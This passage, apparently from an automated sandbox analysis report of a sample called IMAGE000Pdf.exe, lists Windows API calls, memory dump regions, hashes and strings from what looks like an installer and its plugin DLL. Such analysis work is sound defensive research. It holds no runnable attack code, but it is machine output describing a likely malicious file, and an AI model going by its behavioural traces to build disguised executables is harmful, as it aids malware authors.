                                      • Associated: 00000000.00000002.2444532065.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: FilePointer
                                      • String ID:
                                      • API String ID: 973152223-0
                                      • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                      • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                      • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                      • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                      APIs
                                      • SendMessageW.USER32(00000028,?,00000001,004041A4), ref: 00404387
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2444516494.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2444498118.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444532065.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      • Opcode ID: 33429e90f145919918c0f5a16300b6ae2cb664e9c61a266d81822a9c1fb78e21
                                      • Instruction ID: 9ccc480ae856a8f761d654a46a9a0801f91457f8e33b58f107ae6609e89c6df3
                                      • Opcode Fuzzy Hash: 33429e90f145919918c0f5a16300b6ae2cb664e9c61a266d81822a9c1fb78e21
                                      • Instruction Fuzzy Hash: 51B09235181A00AADE914B00DE09F457A62A7A4701F00C029B241240B4CAB200A4DB0A
                                      APIs
                                      • KiUserCallbackDispatcher.NTDLL(?,0040413D), ref: 00404370
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2444516494.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2444498118.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444532065.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: CallbackDispatcherUser
                                      • String ID:
                                      • API String ID: 2492992576-0
                                      • Opcode ID: fb2bbd85db119072699d8509dbb0c67ddc0fed6d182cd9e62e167e16add427de
                                      • Instruction ID: f32ebe17383345fd09930a0b12515434b8b37a693fa3d318b2a69664ac7713bd
                                      • Opcode Fuzzy Hash: fb2bbd85db119072699d8509dbb0c67ddc0fed6d182cd9e62e167e16add427de
                                      • Instruction Fuzzy Hash: 97A00176405540AFEE029B61EF09D4ABB72ABA9701B4185B9A286A0034CB364860EB1D
                                      APIs
                                      • VirtualAlloc.KERNELBASE(00000000), ref: 6F932BB7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2482669839.000000006F931000.00000020.00000001.01000000.00000006.sdmp, Offset: 6F930000, based on PE: true
                                      • Associated: 00000000.00000002.2482628772.000000006F930000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000000.00000002.2482700059.000000006F934000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000000.00000002.2482741619.000000006F936000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6f930000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 5ea9639cf9a3a7477e6e3e829744940b04330aabef2bafd684fc098464e2187d
                                      • Instruction ID: 30ffbab8152f77393644dbdfc1317f240d3f8f231f2d1570176774e78bfeba13
                                      • Opcode Fuzzy Hash: 5ea9639cf9a3a7477e6e3e829744940b04330aabef2bafd684fc098464e2187d
                                      • Instruction Fuzzy Hash: CA4172B3C08725DFEB309FA8D984B5A7778EB1A328F208865E508CA1D1C735E9558FD1
                                      APIs
                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061D5,00000000,00000000), ref: 00406075
                                      • GetShortPathNameW.KERNEL32(?,007A55E8,00000400), ref: 0040607E
                                        • Part of subcall function 00405E49: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000), ref: 00405E59
                                        • Part of subcall function 00405E49: lstrlenA.KERNEL32(00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000), ref: 00405E8B
                                      • GetShortPathNameW.KERNEL32(?,007A5DE8,00000400), ref: 0040609B
                                      • wsprintfA.USER32 ref: 004060B9
                                      • GetFileSize.KERNEL32(00000000,00000000,007A5DE8,C0000000,00000004,007A5DE8,?), ref: 004060F4
                                      • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406103
                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 0040613B
                                      • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,007A51E8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 00406191
                                      • GlobalFree.KERNEL32(00000000), ref: 004061A2
                                      • CloseHandle.KERNEL32(00000000), ref: 004061A9
                                        • Part of subcall function 00405EE4: GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\IMAGE000Pdf.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405EE8
                                        • Part of subcall function 00405EE4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405F0A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2444516494.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2444498118.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444532065.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                      • String ID: %ls=%ls$[Rename]$Uz$]z
                                      • API String ID: 2171350718-2939442745
                                      • Opcode ID: 0ed23fd09f20e9f0b0e4ce5e0ebdd9c0c92abb0a06c9999cd82c312b58dee0fa
                                      • Instruction ID: 03fe7b931bffc2b02635af9c10f4e714808f3729e90155368a1b4a6ed52067ca
                                      • Opcode Fuzzy Hash: 0ed23fd09f20e9f0b0e4ce5e0ebdd9c0c92abb0a06c9999cd82c312b58dee0fa
                                      • Instruction Fuzzy Hash: 44312370600B05BFD6206B618D48F6B3A6CDF86744F15013AFD42FA2C3DA3C99218ABD
                                      APIs
                                      • CharNextW.USER32(?,*?|<>/":,00000000,00000000,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMAGE000Pdf.exe",0040347D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406700
                                      • CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040670F
                                      • CharNextW.USER32(?,00000000,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMAGE000Pdf.exe",0040347D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406714
                                      • CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMAGE000Pdf.exe",0040347D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406727
                                      Strings
                                      • *?|<>/":, xrefs: 004066EF
                                      • "C:\Users\user\Desktop\IMAGE000Pdf.exe", xrefs: 0040669D
                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 0040669E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2444516494.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2444498118.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444532065.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: Char$Next$Prev
                                      • String ID: "C:\Users\user\Desktop\IMAGE000Pdf.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                      • API String ID: 589700163-1199161819
                                      • Opcode ID: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
                                      • Instruction ID: 12c80e2bf748d1a62cb3884e1ae38c2d534281e125f75e63bd15dfe73c9398b2
                                      • Opcode Fuzzy Hash: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
                                      • Instruction Fuzzy Hash: E711EB15800A1255DB303B148C84A7763F8EF947A4F56443FED86732C0E77D4C9286BD
                                      APIs
                                      • GetWindowLongW.USER32(?,000000EB), ref: 004043C8
                                      • GetSysColor.USER32(00000000), ref: 00404406
                                      • SetTextColor.GDI32(?,00000000), ref: 00404412
                                      • SetBkMode.GDI32(?,?), ref: 0040441E
                                      • GetSysColor.USER32(?), ref: 00404431
                                      • SetBkColor.GDI32(?,?), ref: 00404441
                                      • DeleteObject.GDI32(?), ref: 0040445B
                                      • CreateBrushIndirect.GDI32(?), ref: 00404465
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2444516494.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2444498118.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444532065.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                      • String ID:
                                      • API String ID: 2320649405-0
                                      • Opcode ID: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                      • Instruction ID: 7fe0b9bd09f79c55d2aa0e3576d5328f94b18663b05207f77db8afc097fd36db
                                      • Opcode Fuzzy Hash: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                      • Instruction Fuzzy Hash: F62174B15007049BCB319F78D948F5BBBF8AF80714B048A3EE9D2A26E1C734E905CB58
                                      APIs
                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402F49
                                      • MulDiv.KERNEL32(000DED8A,00000064,000DF8B0), ref: 00402F74
                                      • wsprintfW.USER32 ref: 00402F84
                                      • SetWindowTextW.USER32(?,?), ref: 00402F94
                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402FA6
                                      Strings
                                      • verifying installer: %d%%, xrefs: 00402F7E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2444516494.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2444498118.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444532065.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: Text$ItemTimerWindowwsprintf
                                      • String ID: verifying installer: %d%%
                                      • API String ID: 1451636040-82062127
                                      • Opcode ID: e04d04eb7b63203ce5fd1c353c1d281d58231c4b0d3ff082bc1608e2171a15b6
                                      • Instruction ID: 448c993359d53400b231c8c55bc41b2c2aaf26e1e6946bd82a433317a94b79bc
                                      • Opcode Fuzzy Hash: e04d04eb7b63203ce5fd1c353c1d281d58231c4b0d3ff082bc1608e2171a15b6
                                      • Instruction Fuzzy Hash: 1101FF70640209BBEF209F60DE4AFAA3B79EB04349F008039FA16A51D1DBB999559F58
                                      APIs
                                        • Part of subcall function 6F93121B: GlobalAlloc.KERNEL32(00000040,?,6F93123B,?,6F9312DF,00000019,6F9311BE,-000000A0), ref: 6F931225
                                      • GlobalFree.KERNEL32(?), ref: 6F9326A3
                                      • GlobalFree.KERNEL32(00000000), ref: 6F9326D8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2482669839.000000006F931000.00000020.00000001.01000000.00000006.sdmp, Offset: 6F930000, based on PE: true
                                      • Associated: 00000000.00000002.2482628772.000000006F930000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000000.00000002.2482700059.000000006F934000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000000.00000002.2482741619.000000006F936000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6f930000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: Global$Free$Alloc
                                      • String ID:
                                      • API String ID: 1780285237-0
                                      • Opcode ID: 6c812a9eee5b2727fab400dcc5a282acc35bcf4291c9d0e60c96dd58afb8f0d3
                                      • Instruction ID: 7f4f0c4c6b015fe67613fb7a092e5b6b170427385245953916e060844e1c13a2
                                      • Opcode Fuzzy Hash: 6c812a9eee5b2727fab400dcc5a282acc35bcf4291c9d0e60c96dd58afb8f0d3
                                      • Instruction Fuzzy Hash: CD318033E08522DBDB258F68C984C2A77BAFF87318715462AF101871A0C732E8558FA1
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2482669839.000000006F931000.00000020.00000001.01000000.00000006.sdmp, Offset: 6F930000, based on PE: true
                                      • Associated: 00000000.00000002.2482628772.000000006F930000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000000.00000002.2482700059.000000006F934000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000000.00000002.2482741619.000000006F936000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6f930000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: FreeGlobal
                                      • String ID:
                                      • API String ID: 2979337801-0
                                      • Opcode ID: 8ee43e578a30bddcc5b1b98a89fcd2cec359eaf0bd93eef363389cad2859b2f7
                                      • Instruction ID: e931ec7f0704e00f0b079565c040473442ca754d77818bc313240dee99324f3f
                                      • Opcode Fuzzy Hash: 8ee43e578a30bddcc5b1b98a89fcd2cec359eaf0bd93eef363389cad2859b2f7
                                      • Instruction Fuzzy Hash: C351D633D041799A8BA09FB885405AEBAFAEF47316B40825BD404E71F4D771FEC18791
                                      APIs
                                      • GlobalFree.KERNEL32(00000000), ref: 6F932522
                                        • Part of subcall function 6F93122C: lstrcpynW.KERNEL32(00000000,?,6F9312DF,00000019,6F9311BE,-000000A0), ref: 6F93123C
                                      • GlobalAlloc.KERNEL32(00000040), ref: 6F9324A8
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6F9324C3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2482669839.000000006F931000.00000020.00000001.01000000.00000006.sdmp, Offset: 6F930000, based on PE: true
                                      • Associated: 00000000.00000002.2482628772.000000006F930000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000000.00000002.2482700059.000000006F934000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000000.00000002.2482741619.000000006F936000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6f930000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                      • String ID:
                                      • API String ID: 4216380887-0
                                      • Opcode ID: 36a2d6fff4950015bcb48185c737a223e33447540d3bb332df5677f4bb879ae9
                                      • Instruction ID: 00139d18c818db58afd2737c98dbc3c2e5e3d29e57db9d9456f074e33c20c32a
                                      • Opcode Fuzzy Hash: 36a2d6fff4950015bcb48185c737a223e33447540d3bb332df5677f4bb879ae9
                                      • Instruction Fuzzy Hash: F941EEB3C08325EFD7249F689844A6677F8FB9A310B10892DE44A861D2DB32E550CFA1
                                      APIs
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6F932238,?,00000808), ref: 6F931635
                                      • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6F932238,?,00000808), ref: 6F93163C
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6F932238,?,00000808), ref: 6F931650
                                      • GetProcAddress.KERNEL32(6F932238,00000000), ref: 6F931657
                                      • GlobalFree.KERNEL32(00000000), ref: 6F931660
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2482669839.000000006F931000.00000020.00000001.01000000.00000006.sdmp, Offset: 6F930000, based on PE: true
                                      • Associated: 00000000.00000002.2482628772.000000006F930000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000000.00000002.2482700059.000000006F934000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000000.00000002.2482741619.000000006F936000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6f930000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                      • String ID:
                                      • API String ID: 1148316912-0
                                      • Opcode ID: 526268c6697915432e870059462cacc6feec74e5662c53ec85c1735ebc40a384
                                      • Instruction ID: 96058b08874260ed5a33d2ee1ea365194905f6f833a76524711fad18ee38abf0
                                      • Opcode Fuzzy Hash: 526268c6697915432e870059462cacc6feec74e5662c53ec85c1735ebc40a384
                                      • Instruction Fuzzy Hash: A8F0A27320A5387BDA3116AA8C4CC9B7E9CEF8B2F5B120215F6189119085665D11DFF1
                                      APIs
                                      • CharNextW.USER32(?,?,C:\,?,00405DE2,C:\,C:\,?,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405D7C
                                      • CharNextW.USER32(00000000), ref: 00405D81
                                      • CharNextW.USER32(00000000), ref: 00405D99
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2444516494.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2444498118.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444532065.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
